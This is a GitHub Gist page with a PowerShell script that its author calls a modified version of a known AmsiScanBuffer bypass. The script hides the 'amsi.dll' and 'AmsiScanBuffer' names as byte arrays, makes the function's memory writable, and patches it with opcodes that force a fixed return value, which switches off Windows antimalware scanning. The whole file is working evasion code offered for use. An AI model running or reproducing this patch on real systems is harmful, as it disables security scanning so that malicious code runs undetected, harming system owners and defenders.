Last active
August 15, 2024 11:52
-
-
Save FatRodzianko/c8a76537b5a87b850c7d158728717998 to your computer and use it in GitHub Desktop.
small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Win32 = @" | |
using System; | |
using System.Runtime.InteropServices; | |
public class Win32 { | |
[DllImport("kernel32")] | |
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
[DllImport("kernel32")] | |
public static extern IntPtr LoadLibrary(string name); | |
[DllImport("kernel32")] | |
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); | |
} | |
"@ | |
Add-Type $Win32 | |
$test = [Byte[]](0x61, 0x6d, 0x73, 0x69, 0x2e, 0x64, 0x6c, 0x6c) | |
$LoadLibrary = [Win32]::LoadLibrary([System.Text.Encoding]::ASCII.GetString($test)) | |
$test2 = [Byte[]] (0x41, 0x6d, 0x73, 0x69, 0x53, 0x63, 0x61, 0x6e, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72) | |
$Address = [Win32]::GetProcAddress($LoadLibrary, [System.Text.Encoding]::ASCII.GetString($test2)) | |
$p = 0 | |
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p) | |
$Patch = [Byte[]] (0x31, 0xC0, 0x05, 0x78, 0x01, 0x19, 0x7F, 0x05, 0xDF, 0xFE, 0xED, 0x00, 0xC3) | |
#0: 31 c0 xor eax,eax | |
#2: 05 78 01 19 7f add eax,0x7f190178 | |
#7: 05 df fe ed 00 add eax,0xedfedf | |
#c: c3 ret | |
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, $Patch.Length) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment